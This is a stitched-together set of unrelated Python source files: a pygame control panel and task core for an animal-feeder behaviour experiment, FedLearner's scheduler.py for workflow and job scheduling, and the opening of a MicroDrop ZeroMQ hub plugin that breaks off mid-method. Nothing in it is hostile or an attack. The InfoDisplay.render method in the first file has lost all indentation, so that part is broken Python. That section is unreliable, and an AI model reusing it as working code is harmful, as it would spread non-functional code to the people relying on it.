                                             'color': (0, 128, 0)}}
                buttonReleasePellet.append(nFeederButton)
            self.list.append(buttonReleasePellet)
            self.names.append('buttonReleasePellet')
        # Button to start milkTrial
        if not (self._MilkRewardDevices is None):
            buttonMilkTrial = []
            buttonMilkTrial.append({'text': 'Milk Trial'})
            for ID in self._MilkRewardDevices.IDs_active:
                nFeederButton = {'callback': self.buttonMilkTrial_callback,
                                 'callargs': [ID],
                                 'text': ID,
                                 'enabled': True,
                                 'toggled': {'text': ID,
                                             'color': (0, 128, 0)}}
                buttonMilkTrial.append(nFeederButton)
            self.list.append(buttonMilkTrial)
            self.names.append('buttonMilkTrial')
        # Button to release milk
        if not (self._MilkRewardDevices is None):
            buttonReleaseMilk = []
            buttonReleaseMilk.append({'text': 'Deposit Milk'})
            for ID in self._MilkRewardDevices.IDs_active:
                nFeederButton = {'callback': self.buttonReleaseReward_callback,
                                 'callargs': ['milk', ID],
                                 'text': ID,
                                 'enabled': True,
                                 'toggled': {'text': ID,
                                             'color': (0, 128, 0)}}
                buttonReleaseMilk.append(nFeederButton)
            self.list.append(buttonReleaseMilk)
            self.names.append('buttonReleaseMilk')
        # Add default properties to all buttons
        self.list = Buttons._addDefaultProperties(self.list)

    @staticmethod
    def _addDefaultProperties(buttons):
        """Fill in default 'color', 'button_pressed', 'enabled' and
        'not_enabled_color' values on every button and sub-button."""
        # Add default color to all buttons
        for i, button in enumerate(buttons):
            if isinstance(button, dict):
                if not ('color' in button.keys()):
                    buttons[i]['color'] = (128, 128, 128)
            elif isinstance(button, list):
                for j, subbutton in enumerate(button[1:]):
                    if not ('color' in subbutton.keys()):
                        buttons[i][j + 1]['color'] = (128, 128, 128)
        # Add default button un-pressed state
        for i, button in enumerate(buttons):
            if isinstance(button, dict):
                if not ('button_pressed' in button.keys()):
                    buttons[i]['button_pressed'] = False
            elif isinstance(button, list):
                for j, subbutton in enumerate(button[1:]):
                    if not ('button_pressed' in subbutton.keys()):
                        buttons[i][j + 1]['button_pressed'] = False
        # Add default button enabled state and disabled-display color
        for i, button in enumerate(buttons):
            if isinstance(button, dict):
                if not ('enabled' in button.keys()):
                    buttons[i]['enabled'] = True
                # BUG FIX: this previously re-checked 'enabled' (always present
                # by now), so plain buttons never received 'not_enabled_color'
                # and _draw_button raised KeyError for a disabled plain button.
                if not ('not_enabled_color' in button.keys()):
                    buttons[i]['not_enabled_color'] = (255, 0, 0)
            elif isinstance(button, list):
                for j, subbutton in enumerate(button[1:]):
                    if not ('enabled' in subbutton.keys()):
                        buttons[i][j + 1]['enabled'] = True
                    if not ('not_enabled_color' in subbutton.keys()):
                        buttons[i][j + 1]['not_enabled_color'] = (255, 0, 0)
        return buttons

    @staticmethod
    def _pre_render(buttons, position_on_screen, renderText):
        """Compute each button's screen rectangle and pre-render its text."""
        # Compute button locations
        xpos = position_on_screen['left']
        xlen = position_on_screen['right'] - position_on_screen['left']
        ypos = np.linspace(position_on_screen['top'], position_on_screen['bottom'], 2 * len(buttons))
        ylen = ypos[1] - ypos[0]
        ypos = ypos[::2]
        for i, button in enumerate(buttons):
            if isinstance(button, dict):
                buttons[i]['Position'] = (int(round(xpos)), int(round(ypos[i])), int(round(xlen)), int(round(ylen)))
            elif isinstance(button, list):
                # Header takes the top half of the slot; sub-buttons split the bottom half
                xsubpos = np.linspace(xpos, xpos + xlen, 2 * (len(button) - 1))
                xsublen = xsubpos[1] - xsubpos[0]
                xsubpos = xsubpos[::2]
                for j, subbutton in enumerate(button):
                    if j == 0:
                        buttons[i][j]['Position'] = (int(round(xpos)), int(round(ypos[i])), int(round(xlen)), int(round(ylen / 2.0)))
                    else:
                        buttons[i][j]['Position'] = (int(round(xsubpos[j - 1])), int(round(ypos[i] + ylen / 2.0)), int(round(xsublen)), int(round(ylen / 2.0)))
        # Create button rectangles (the display-only group header gets no Rect)
        for i, button in enumerate(buttons):
            if isinstance(button, dict):
                buttons[i]['Rect'] = pygame.Rect(button['Position'])
            elif isinstance(button, list):
                for j, subbutton in enumerate(button[1:]):
                    buttons[i][j + 1]['Rect'] = pygame.Rect(subbutton['Position'])
        # Render button texts
        for i, button in enumerate(buttons):
            if isinstance(button, dict):
                buttons[i]['textRendered'] = renderText(button['text'])
                if 'toggled' in button.keys():
                    buttons[i]['toggled']['textRendered'] = renderText(button['toggled']['text'])
            elif isinstance(button, list):
                for j, subbutton in enumerate(button):
                    buttons[i][j]['textRendered'] = renderText(subbutton['text'])
                    if 'toggled' in subbutton.keys():
                        buttons[i][j]['toggled']['textRendered'] = renderText(subbutton['toggled']['text'])
        return buttons

    @staticmethod
    def _draw_button(screen, button):
        """Draw a single button in its current (pressed/enabled) state."""
        if button['enabled']:
            # If button is pressed down, use the toggled color and text
            if button['button_pressed']:
                color = button['toggled']['color']
                textRendered = button['toggled']['textRendered']
            else:
                color = button['color']
                textRendered = button['textRendered']
        else:
            # If button is not enabled, use the 'not_enabled_color' and default text
            color = button['not_enabled_color']
            textRendered = button['textRendered']
        pygame.draw.rect(screen, color, button['Position'], 0)
        screen.blit(textRendered, button['Position'][:2])

    def render(self, screen):
        """Draw every button (and group header text) onto `screen`."""
        for i, button in enumerate(self.list):
            if isinstance(button, dict):
                Buttons._draw_button(screen, button)
            elif isinstance(button, list):
                # Display name for button group
                screen.blit(button[0]['textRendered'], button[0]['Position'][:2])
                for j, subbutton in enumerate(button[1:]):
                    Buttons._draw_button(screen, subbutton)

    def click(self, pos):
        """
        Checks if pos matches collidepoint of any buttons in self.list
        If there is a match, callback function is called for that button,
        if it is enabled (['enabled'] = True).
        """
        for button in self.list:
            if isinstance(button, dict):
                if button['Rect'].collidepoint(pos) and button['enabled']:
                    Thread(target=button['callback'], args=(button,)).start()
            elif isinstance(button, list):
                for subbutton in button[1:]:
                    if subbutton['Rect'].collidepoint(pos) and subbutton['enabled']:
                        Thread(target=subbutton['callback'], args=(subbutton,)).start()
class InfoDisplay(object):
    def __init__(self, renderText, position, game_counters):
        # renderText: pygame text render method used by render();
        # position: dict with 'top'/'bottom'/'left'/'right' screen borders;
        # game_counters: shared dict of per-feeder counters to display.
        self._renderText = renderText
        self._position = position
        self._game_counters = game_counters
        # Current game state string; lock-guarded as it is written from another thread
        self._game_state = ''
        self._game_state_Lock = Lock()
    def update_game_state(self, game_state):
        # Thread-safe setter for the displayed game state string
        with self._game_state_Lock:
            self._game_state = game_state
    def get_game_state(self):
        # Thread-safe getter for the displayed game state string
        with self._game_state_Lock:
            return self._game_state
def render(self, screen):
# Compute window borders
xborder = (self._position['left'], self._position['right'])
yborder = (self._position['top'], self._position['bottom'])
# Compute text spacing
textSpacing = 3
textSpace = 10 + textSpacing
# Display game state
game_state_pos = (xborder[0], yborder[0])
screen.blit(self._renderText('Game State:'), game_state_pos)
game_state_current_pos = (xborder[0], yborder[0] + textSpace)
screen.blit(self._renderText(str(self.get_game_state().upper())), game_state_current_pos)
# Split rest of screen in 5 columns
title_topedge = game_state_pos[1] + 3 * textSpace
topedge = game_state_pos[1] + 4 * textSpace
columnedges = np.linspace(xborder[0], xborder[1], 10)
columnedges = columnedges[::2]
# Display Pellet Game info
if 'Pellets' in self._game_counters.keys():
# Display pellet feeder IDs
screen.blit(self._renderText('ID'), (columnedges[0], title_topedge))
for i, ID in enumerate(self._game_counters['Pellets']['ID']):
screen.blit(self._renderText(ID), (columnedges[0], topedge + i * textSpace))
# Display pellet counts
screen.blit(self._renderText('pellets'), (columnedges[1], title_topedge))
for i, count in enumerate(self._game_counters['Pellets']['count']):
screen.blit(self._renderText(str(count)), (columnedges[1], topedge + i * textSpace))
# Display Milk Game info
if 'Milk trials' in self._game_counters.keys():
# Display milk feeder IDs
screen.blit(self._renderText('ID'), (columnedges[2], title_topedge))
for i, ID in enumerate(self._game_counters['Milk trials']['ID']):
screen.blit(self._renderText(ID), (columnedges[2], topedge + i * textSpace))
# Display milk trial counts
screen.blit(self._renderText('milk trials'), (columnedges[3], title_topedge))
for i, count in enumerate(self._game_counters['Milk trials']['count']):
screen.blit(self._renderText(str(count)), (columnedges[3], topedge + i * textSpace))
# Display successful milk trial counts
screen.blit(self._renderText('successful'), (columnedges[4], title_topedge))
for i, count in enumerate(self._game_counters['Successful']['count']):
screen.blit(self._renderText(str(count)), (columnedges[4], topedge + i * textSpace))
class TextRenderer(object):
    # Pre-configured renderer for short UI strings: 10 pt Arial, white.
    def __init__(self):
        # Requires pygame.font to have been initialized beforehand
        # (presumably via the file's init_pygame() — TODO confirm).
        self._font = pygame.font.SysFont('Arial', 10)
        self._color = (255, 255, 255)
    def render(self, text):
        """Return an antialiased surface rendering of *text*."""
        return self._font.render(text, True, self._color)
class Display(object):
    """Owns the pygame window and refreshes it from registered render methods."""
    def __init__(self, size, variable_display, button_display, info_display, update_rate=20):
        """
        size - tuple - (width, height) of screen as int
        variable_display - VariableDisplay instance render method
        button_display - Buttons instance render method
        info_display - InfoDisplay instance render method
        update_rate - int - screen refresh rate in Hz
        """
        # Render callables are invoked in this order on every frame.
        self._render_methods = [variable_display, button_display, info_display]
        self._screen = pygame.display.set_mode(size)
        self._update_rate = update_rate

    def _update(self):
        """Clear the screen, run all render methods and flip the display."""
        self._screen.fill((0, 0, 0))
        for renderer in self._render_methods:
            renderer(self._screen)
        pygame.display.update()

    def _process(self):
        """Refresh the display at self._update_rate Hz until close() is called."""
        self._continue = True
        loop_clock = pygame.time.Clock()
        while self._continue:
            self._update()
            loop_duration = loop_clock.tick(self._update_rate)
            # Warn when a frame took noticeably longer than the frame budget.
            if loop_duration > (25 + 1000 / self._update_rate):
                warnings.warn('Method logic in ' + str(type(self)) + \
                              ' runs slower than assigned ' + \
                              'rate ' + str(self._update_rate) + ' Hz. Duration ' + \
                              str(loop_duration) + ' ms.', RuntimeWarning)

    def start(self):
        """Start display refreshing in a background thread."""
        self._T__process = Thread(target=self._process)
        self._T__process.start()

    def close(self):
        """Stop the refresh thread, if it was started, and wait for it."""
        if hasattr(self, '_T__process'):
            self._continue = False
            self._T__process.join()

    @staticmethod
    def Positions(n_variables):
        """Compute the window size and layout rectangles for all UI elements.

        Returns (size, variables, buttons, counters) where size is the
        (width, height) of the screen and the rest are dicts with 'top',
        'bottom', 'left' and 'right' pixel edges.
        """
        # Set constants for screen shape
        margins = 20
        height = 300
        variables_width = n_variables * 80
        buttons_width = 300
        text_width = 300
        # Compute screen size.
        # FIX: use the `height` constant instead of a duplicated literal 300,
        # so the value above is the single source of truth.
        size = (6 * margins + variables_width + buttons_width + text_width, height)
        # Compute position of variable bars
        variables = {'top': margins,
                     'bottom': size[1] - margins,
                     'left': margins,
                     'right': margins + variables_width}
        # Compute position for buttons
        buttons = {'top': margins,
                   'bottom': size[1] - margins,
                   'left': 3 * margins + variables_width,
                   'right': 3 * margins + variables_width + buttons_width}
        # Compute position for counters
        counters = {'top': margins,
                    'bottom': size[1] - margins,
                    'left': 5 * margins + variables_width + buttons_width,
                    'right': 5 * margins + variables_width + buttons_width + text_width}
        return size, variables, buttons, counters
class UserEventHandler(object):
    """Polls pygame events (window close, left clicks) in a background thread."""
    def __init__(self, button_click_method, KillSwitch, response_rate=60):
        """
        button_click_method - callable - invoked with the click position
        KillSwitch - callable - invoked when the window close event arrives
        response_rate - int - event polling rate in Hz
        """
        self._button_click_method = button_click_method
        self._KillSwitch = KillSwitch
        self._response_rate = response_rate

    def _check_events(self):
        """Dispatch all pending pygame events to their handlers."""
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                self._KillSwitch()
            elif event.type == pygame.MOUSEBUTTONDOWN:
                if event.button == 1:
                    # Process click with Buttons class click detector on a
                    # separate thread so event polling is not blocked.
                    Thread(target=self._button_click_method, args=(event.pos,)).start()

    def _process(self):
        """Poll events at self._response_rate Hz until close() is called."""
        self._continue = True
        loop_clock = pygame.time.Clock()
        while self._continue:
            self._check_events()
            loop_duration = loop_clock.tick(self._response_rate)
            if loop_duration > (25 + 1000 / self._response_rate):
                # BUGFIX: report the measured loop duration; previously this
                # printed self._response_rate as the "Duration", matching
                # neither the text nor the sibling Display._process warning.
                warnings.warn('Method logic in ' + str(type(self)) + \
                              ' runs slower than assigned ' + \
                              'rate ' + str(self._response_rate) + ' Hz. Duration ' + \
                              str(loop_duration) + ' ms.', RuntimeWarning)

    def start(self):
        """Start event polling in a background thread."""
        self._T__process = Thread(target=self._process)
        self._T__process.start()

    def close(self):
        """Stop the polling thread, if it was started, and wait for it."""
        if hasattr(self, '_T__process'):
            self._continue = False
            self._T__process.join()
class Core(object):
    # Top-level task controller: constructs reward devices, game logic,
    # display and user-event handling, and coordinates startup/shutdown.
    def __init__(self, TaskSettings, open_ephys_message_pipe, processed_position_list,
                 processed_position_update_interval, position_histogram_array, position_histogram_dict):
        """Initializes all possible devices to prepare for start command.

        :param TaskSettings:
        :param multiprocessing.connection open_ephys_message_pipe:
        :param multiprocessing.managers.List processed_position_list:
        :param int processed_position_update_interval:
        :param multiprocessing.Array position_histogram_array:
        :param multiprocessing.managers.Dict position_histogram_dict:
        """
        # Parse input
        # NOTE: pop() removes 'FEEDERs' from TaskSettings before it is stored.
        FEEDERs = TaskSettings.pop('FEEDERs')
        self.TaskSettings = TaskSettings
        self.open_ephys_message_pipe = open_ephys_message_pipe
        self.processed_position_list = processed_position_list
        self.processed_position_update_interval = processed_position_update_interval
        self.position_histogram_array = position_histogram_array
        self.position_histogram_dict = position_histogram_dict
        self._closed = False
        # Initialize pygame engine
        init_pygame()
        # Initialize Pellet Rewards
        if self.TaskSettings['games_active']['pellet']:
            print('Initializing Pellet FEEDERs...')
            self.PelletRewardDevices = RewardDevices(FEEDERs['pellet'], 'pellet',
                                                     self.TaskSettings['Username'],
                                                     self.TaskSettings['Password'],
                                                     inactivation_signal=self._inactivation_signal)
            print('Initializing Pellet FEEDERs Successful')
        else:
            self.PelletRewardDevices = None
        # Initialize Milk Rewards
        if self.TaskSettings['games_active']['milk']:
            print('Initializing Milk FEEDERs ...')
            feeder_kwargs = Core.prepare_milk_feeder_kwargs(FEEDERs['milk'], TaskSettings)
            self.MilkRewardDevices = RewardDevices(FEEDERs['milk'], 'milk',
                                                   self.TaskSettings['Username'],
                                                   self.TaskSettings['Password'],
                                                   feeder_kwargs=feeder_kwargs,
                                                   inactivation_signal=self._inactivation_signal)
            print('Initializing Milk FEEDERs Successful')
        else:
            self.MilkRewardDevices = None
        # Initialize counters (deepcopy so later ID-list mutations in the
        # device objects do not alter the displayed counter tables)
        self.game_counters = {}
        if self.TaskSettings['games_active']['pellet']:
            self.game_counters['Pellets'] = {'ID': deepcopy(self.PelletRewardDevices.IDs_active),
                                             'count': [0] * len(self.PelletRewardDevices.IDs_active)}
        if self.TaskSettings['games_active']['milk']:
            self.game_counters['Milk trials'] = {'ID': deepcopy(self.MilkRewardDevices.IDs_active),
                                                 'count': [0] * len(self.MilkRewardDevices.IDs_active)}
            self.game_counters['Successful'] = {'ID': deepcopy(self.MilkRewardDevices.IDs_active),
                                                'count': [0] * len(self.MilkRewardDevices.IDs_active)}
        # Initialize Pellet Game
        if self.TaskSettings['games_active']['pellet']:
            self.PelletChoice = PelletChoice(self.PelletRewardDevices, self.position_histogram_array,
                                             self.position_histogram_dict, self.TaskSettings['arena_size'])
        else:
            self.PelletChoice = None
        # Initialize Milk Game
        if self.TaskSettings['games_active']['milk']:
            self.MilkTrialSignals = MilkTrialSignals(self.TaskSettings,
                                                     self.MilkRewardDevices.actuator_method_call,
                                                     self.send_message_to_open_ephys, FEEDERs['milk'])
            self.MilkGoal = MilkGoal(self.MilkRewardDevices.IDs_active,
                                     next_feeder_method=self.TaskSettings['MilkGoalNextFeederMethod'],
                                     repetitions=self.TaskSettings['MilkGoalRepetition'])
        else:
            self.MilkTrialSignals = None
            self.MilkGoal = None
        # Prepare chewing counter
        if self.TaskSettings['games_active']['pellet']:
            self.ChewingTracker = ChewingTracker(self.TaskSettings['Chewing_TTLchan'])
            # Background thread forwards Open Ephys messages to the tracker
            # until stop() sets self._closed.
            self.chewing_tracker_update_method_thread = Thread(target=self.chewing_tracker_update_method)
            self.chewing_tracker_update_method_thread.start()
        else:
            self.ChewingTracker = None

    @property
    def closed(self):
        # True once stop() has completed; ends the chewing-tracker loop.
        return self._closed

    def send_message_to_open_ephys(self, message):
        """Forward *message* to the Open Ephys process over the pipe."""
        self.open_ephys_message_pipe.send(message)

    def chewing_tracker_update_method(self):
        """Poll the Open Ephys pipe and feed messages to the ChewingTracker.

        Runs in a background thread (started in __init__) until stop()
        sets self._closed. The 0.1 s poll timeout bounds shutdown latency.
        """
        while not self.closed:
            if self.open_ephys_message_pipe.poll(0.1):
                message = self.open_ephys_message_pipe.recv()
                self.ChewingTracker.check_for_chewing_message(message)

    @staticmethod
    def prepare_milk_feeder_kwargs(FEEDERs, TaskSettings):
        """
        Prepares specific milk feeder kwargs for use in Reward Devices class

        FEEDERs - dict - key (ID) and value (feeder specific parameters)
        TaskSettings - dict - see below for used keys
        """
        # Grab relevant values from TaskSettings
        AudioSignalMode = TaskSettings['AudioSignalMode']
        negativeAudioSignal = TaskSettings['NegativeAudioSignal']
        lightSignalIntensity = TaskSettings['lightSignalIntensity']
        lightSignalPins = list(map(int, TaskSettings['lightSignalPins'].split(',')))
        # Create settings for each feeder ID
        feeder_kwargs = {}
        for ID in FEEDERs.keys():
            # NOTE(review): if AudioSignalMode is neither 'ambient' nor
            # 'localised', trialAudioSignal is unbound below — presumably
            # settings are validated upstream; confirm.
            if AudioSignalMode == 'ambient':
                trialAudioSignal = None
            elif AudioSignalMode == 'localised':
                trialAudioSignal = (FEEDERs[ID]['SignalHz'],
                                    FEEDERs[ID]['SignalHzWidth'],
                                    FEEDERs[ID]['ModulHz'])
            feeder_kwargs[ID] = {'trialAudioSignal': trialAudioSignal,
                                 'negativeAudioSignal': negativeAudioSignal,
                                 'lightSignalIntensity': lightSignalIntensity,
                                 'lightSignalPins': lightSignalPins}
        return feeder_kwargs

    def _final_initialization(self):
        """
        Final initialization that depends on task inputs to be active (e.g. tracking).
        """
        # Initialize text rendering for faster display
        self.TextRenderer = TextRenderer()
        # Initialize variables first to find out how many are in use
        self.Variables = Core.init_Variables(self.TaskSettings, self.processed_position_list,
                                             self.processed_position_update_interval, self.ChewingTracker,
                                             self.MilkRewardDevices, self.MilkGoal)
        # Get positions of all display elements based on number of variables
        display_size, variable_pos, buttons_pos, info_pos = Display.Positions(len(self.Variables.full_list()))
        # Initialize variable display
        self.VariableDisplay = VariableDisplay(variable_pos, self.TextRenderer.render,
                                               self.Variables)
        # Initialize buttons along with button rendering
        self.Buttons = Buttons(buttons_pos, self.TextRenderer.render,
                               self.PelletRewardDevices, self.MilkRewardDevices)
        # Initialize info display
        self.InfoDisplay = InfoDisplay(self.TextRenderer.render, info_pos, self.game_counters)
        # Initialize display
        self.Display = Display(display_size, self.VariableDisplay.render,
                               self.Buttons.render, self.InfoDisplay.render)
        # Initialize Game State Process
        self.GameStateOperator = GameStateOperator(self.TaskSettings, self.send_message_to_open_ephys,
                                                   self.Variables, self.game_counters,
                                                   self.InfoDisplay.update_game_state,
                                                   self.PelletRewardDevices, self.PelletChoice,
                                                   self.MilkRewardDevices, self.MilkTrialSignals,
                                                   self.MilkGoal)
        # Initialize user event detection and handling
        self.UserEventHandler = UserEventHandler(self.Buttons.click, self.KillSwitch)

    @staticmethod
    def init_Variables(TaskSettings, processed_position_list, processed_position_update_interval,
                       ChewingTracker=None, MilkRewardDevices=None, MilkGoal=None):
        """Pre-compute derived step/distance settings and build Variables."""
        # Pre-compute variables (number of position updates per second etc.)
        TaskSettings['one_second_steps'] = \
            int(np.round(1 / processed_position_update_interval))
        TaskSettings['max_distance_in_arena'] = \
            int(round(np.hypot(TaskSettings['arena_size'][0], TaskSettings['arena_size'][1])))
        TaskSettings['distance_steps'] = \
            int(np.round(TaskSettings['LastTravelTime'] * TaskSettings['one_second_steps']))
        TaskSettings['angular_distance_steps'] = \
            int(np.round(TaskSettings['MilkTaskGoalAngularDistanceTime'] * TaskSettings['one_second_steps']))
        # Start Variable class
        return Variables(TaskSettings, processed_position_list, ChewingTracker, MilkRewardDevices, MilkGoal)

    def _inactivation_signal(self, device_type, ID):
        """
        This method is passed to reward devices and invoked each time a device is inactivated.
        """
        self.Buttons._inactivate_device(device_type, ID)
        if device_type == 'pellet':
            self.PelletChoice._ensure_nearest_feeder_map_valid(self.PelletRewardDevices.IDs_active)
        elif device_type == 'milk':
            self.MilkGoal.re_init(self.MilkRewardDevices.IDs_active)
        else:
            raise ValueError('Unknown device_type: ' + str(device_type))

    def run(self):
        """Finish initialization and start display, game logic and event threads."""
        # Perform final initialization steps
        self._final_initialization()
        # Start Display
        self.Display.start()
        # Start Game State Process
        self.GameStateOperator.start()
        # Start Display event detection
        self.UserEventHandler.start()

    def KillSwitch(self):
        """
        Allows shutting down all downstream and upstream processes.
        Can be called by child processes.
        """
        self.stop()

    def stop(self):
        """Shut down all subsystems in reverse dependency order."""
        print('Closing Task processes ...')
        # Stop Display event detection
        if hasattr(self, 'UserEventHandler'):
            self.UserEventHandler.close()
        # Stop Game State Process
        if hasattr(self, 'GameStateOperator'):
            self.GameStateOperator.close()
        # Stop updating display
        if hasattr(self, 'Display'):
            self.Display.close()
        # Stop updating ingame variables
        if hasattr(self, 'Variables'):
            self.Variables.close()
        print('Closing Task processes successful')
        # Close FEEDER connections
        if hasattr(self, 'PelletRewardDevices'):
            if hasattr(self.PelletRewardDevices, 'close'):
                print('Closing Pellet FEEDER connections...')
                self.PelletRewardDevices.close()
                print('Closing Pellet FEEDER connections successful.')
        if hasattr(self, 'MilkRewardDevices'):
            if hasattr(self.MilkRewardDevices, 'close'):
                print('Closing Milk FEEDER connections...')
                self.MilkRewardDevices.close()
                print('Closing Milk FEEDER connections successful.')
        # Close pygame engine
        close_pygame()
        # Mark closed so the chewing-tracker thread's loop terminates.
        self._closed = True
|
scheduler.py | # Copyright 2020 The FedLearner Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
# pylint: disable=broad-except
import os
import threading
import logging
import traceback
from fedlearner_webconsole.job.yaml_formatter import generate_job_run_yaml
from fedlearner_webconsole.db import db
from fedlearner_webconsole.dataset.import_handler import ImportHandler
from fedlearner_webconsole.workflow.models import Workflow, WorkflowState
from fedlearner_webconsole.job.models import Job, JobState, JobDependency
from fedlearner_webconsole.scheduler.transaction import TransactionManager
from fedlearner_webconsole.k8s_client import get_client
from fedlearner_webconsole.utils.k8s_client import CrdKind
class Scheduler(object):
    """Background scheduler that polls workflows/jobs and dataset imports.

    A single daemon thread runs _routine(), which wakes either on wakeup()
    notifications (processing only the queued ids) or on a polling-interval
    timeout (processing everything that may need scheduling).
    """
    def __init__(self):
        # Condition guards all pending-id lists and the terminate flag.
        self._condition = threading.Condition(threading.RLock())
        self._running = False
        self._terminate = False
        self._thread = None
        self._pending_workflows = []
        self._pending_jobs = []
        self._app = None
        self._import_handler = ImportHandler()

    def start(self, app, force=False):
        """Start the scheduling thread.

        Raises RuntimeError if already running, unless *force* is True, in
        which case the running scheduler is stopped and restarted.
        """
        if self._running:
            if not force:
                raise RuntimeError("Scheduler is already started")
            self.stop()
        self._app = app
        with self._condition:
            self._running = True
            self._terminate = False
            self._thread = threading.Thread(target=self._routine)
            self._thread.daemon = True
            self._thread.start()
            self._import_handler.init(app)
        logging.info('Scheduler started')

    def stop(self):
        """Signal the routine thread to terminate and wait for it to exit."""
        if not self._running:
            return
        with self._condition:
            self._terminate = True
            self._condition.notify_all()
            # FIX: was a leftover debug print('stopping'); log it instead.
            logging.info('Stopping scheduler')
        self._thread.join()
        self._running = False
        logging.info('Scheduler stopped')

    def wakeup(self, workflow_ids=None,
               job_ids=None,
               data_batch_ids=None):
        """Queue ids for immediate processing and wake the routine thread.

        Scalar ints are accepted and normalized to single-element lists.
        """
        with self._condition:
            if workflow_ids:
                if isinstance(workflow_ids, int):
                    workflow_ids = [workflow_ids]
                self._pending_workflows.extend(workflow_ids)
            if job_ids:
                if isinstance(job_ids, int):
                    job_ids = [job_ids]
                self._pending_jobs.extend(job_ids)
            if data_batch_ids:
                self._import_handler.schedule_to_handle(data_batch_ids)
            self._condition.notify_all()

    def _routine(self):
        """Main loop: process pending ids on wakeup, or poll everything on timeout."""
        self._app.app_context().push()
        interval = int(os.environ.get(
            'FEDLEARNER_WEBCONSOLE_POLLING_INTERVAL', 60))
        while True:
            with self._condition:
                notified = self._condition.wait(interval)
                if self._terminate:
                    return
                if notified:
                    workflow_ids = self._pending_workflows
                    self._pending_workflows = []
                    self._poll_workflows(workflow_ids)
                    job_ids = self._pending_jobs
                    self._pending_jobs = []
                    # Also pick up WAITING jobs belonging to the just-polled
                    # workflows.
                    # BUGFIX: `Job.workflow_id in workflow_ids` applied
                    # Python's `in` to a SQLAlchemy column, which does not
                    # build a SQL IN clause; use Column.in_() instead.
                    job_ids.extend([
                        jid for jid, in db.session.query(Job.id)
                        .filter(Job.state == JobState.WAITING)
                        .filter(Job.workflow_id.in_(workflow_ids))])
                    self._poll_jobs(job_ids)
                    self._import_handler.handle(pull=False)
                    continue
                # Timed out: poll all schedulable workflows and jobs.
                workflows = db.session.query(Workflow.id).filter(
                    Workflow.target_state != WorkflowState.INVALID).all()
                self._poll_workflows([wid for wid, in workflows])
                jobs = db.session.query(Job.id).filter(
                    Job.state == JobState.WAITING).all()
                self._poll_jobs([jid for jid, in jobs])
                self._import_handler.handle(pull=True)

    def _poll_workflows(self, workflow_ids):
        """Run the transaction manager for each workflow id, logging failures."""
        logging.info('Scheduler polling %d workflows...', len(workflow_ids))
        for workflow_id in workflow_ids:
            try:
                self._schedule_workflow(workflow_id)
            except Exception:
                logging.warning(
                    "Error while scheduling workflow %d:\n%s",
                    workflow_id, traceback.format_exc())

    def _poll_jobs(self, job_ids):
        """Try to start each job id, logging (not raising) failures."""
        logging.info('Scheduler polling %d jobs...', len(job_ids))
        for job_id in job_ids:
            try:
                self._schedule_job(job_id)
            except Exception:
                logging.warning(
                    "Error while scheduling job %d:\n%s",
                    job_id, traceback.format_exc())

    def _schedule_workflow(self, workflow_id):
        """Advance the workflow's state machine via its TransactionManager."""
        logging.debug('Scheduling workflow %d', workflow_id)
        tm = TransactionManager(workflow_id)
        return tm.process()

    def _schedule_job(self, job_id):
        """Start a WAITING job once all of its dependencies are complete.

        Returns the (possibly updated) job state.
        """
        job = Job.query.get(job_id)
        assert job is not None, 'Job %d not found' % job_id
        if job.state != JobState.WAITING:
            return job.state
        deps = JobDependency.query.filter(
            JobDependency.dst_job_id == job.id).all()
        for dep in deps:
            src_job = Job.query.get(dep.src_job_id)
            assert src_job is not None, 'Job %d not found' % dep.src_job_id
            if not src_job.is_complete():
                # An upstream job is still running; try again later.
                return job.state
        k8s_client = get_client()
        yaml = generate_job_run_yaml(job)
        try:
            k8s_client.create_or_replace_custom_object(CrdKind.FLAPP, yaml,
                                                       job.project
                                                       .get_namespace())
        except RuntimeError as e:
            logging.error('Start job %d has Runtime error msg: %s',
                          job_id, e.args)
            return job.state
        job.start()
        db.session.commit()
        return job.state
# Module-level Scheduler instance shared by importers of this module.
scheduler = Scheduler()
|
__init__.py | # coding: utf-8
from multiprocessing import Process
import logging
import signal
import threading
from asyncio_helpers import cancellable
from flatland import Form, String, Enum
from logging_helpers import _L
from zmq_plugin.bin.hub import run_hub
from zmq_plugin.hub import Hub
from zmq_plugin.plugin import Plugin as ZmqPlugin
import trollius as asyncio
from ...app_context import get_hub_uri
from ...plugin_helpers import AppDataController
from ...plugin_manager import (PluginGlobals, SingletonPlugin, IPlugin,
implements)
logger = logging.getLogger(__name__)
PluginGlobals.push_env('microdrop')
def _safe_run_hub(*args, **kwargs):
    '''
    .. versionadded:: 2.15.2

    Wrapper around :func:`run_hub` that first installs a no-op ``SIGINT``
    handler, so pressing `control-C` does not kill the hub process.
    '''
    def _ignore_sigint(*_):
        # Shutdown is driven by the parent process, not by SIGINT.
        pass
    signal.signal(signal.SIGINT, _ignore_sigint)
    return run_hub(*args, **kwargs)
class MicroDropHub(Hub):
    # Hub subclass that logs (rather than propagates) errors raised while
    # handling command-socket messages, keeping the hub process alive.
    def on_command_recv(self, msg_frames):
        """Handle one command-socket message; log any exception instead of raising."""
        try:
            super(MicroDropHub, self).on_command_recv(msg_frames)
        except Exception:
            _L().error('Command socket message error.', exc_info=True)
class ZmqHubPlugin(SingletonPlugin, AppDataController):
    """
    This class is automatically registered with the PluginManager.
    """
    implements(IPlugin)
    plugin_name = 'microdrop.zmq_hub_plugin'
    '''
    AppFields
    ---------
    A flatland Form specifying application options for the current plugin.
    Note that nested Form objects are not supported.
    Since we subclassed AppDataController, an API is available to access and
    modify these attributes. This API also provides some nice features
    automatically:
    -all fields listed here will be included in the app options dialog
    (unless properties=dict(show_in_gui=False) is used)
    -the values of these fields will be stored persistently in the microdrop
    config file, in a section named after this plugin's name attribute
    '''
    AppFields = Form.of(
        String.named('hub_uri').using(optional=True, default='tcp://*:31000'),
        Enum.named('log_level').using(default='info', optional=True)
        .valued('debug', 'info', 'warning', 'error', 'critical'))

    def __init__(self):
        self.name = self.plugin_name
        # Child process running the ZeroMQ hub (created on plugin enable).
        self.hub_process = None
        #: ..versionadded:: 2.25
        self.exec_thread = None

    def on_plugin_enable(self):
        '''
        .. versionchanged:: 2.25
            Start asyncio event loop in background thread to process ZeroMQ hub
            execution requests.
        '''
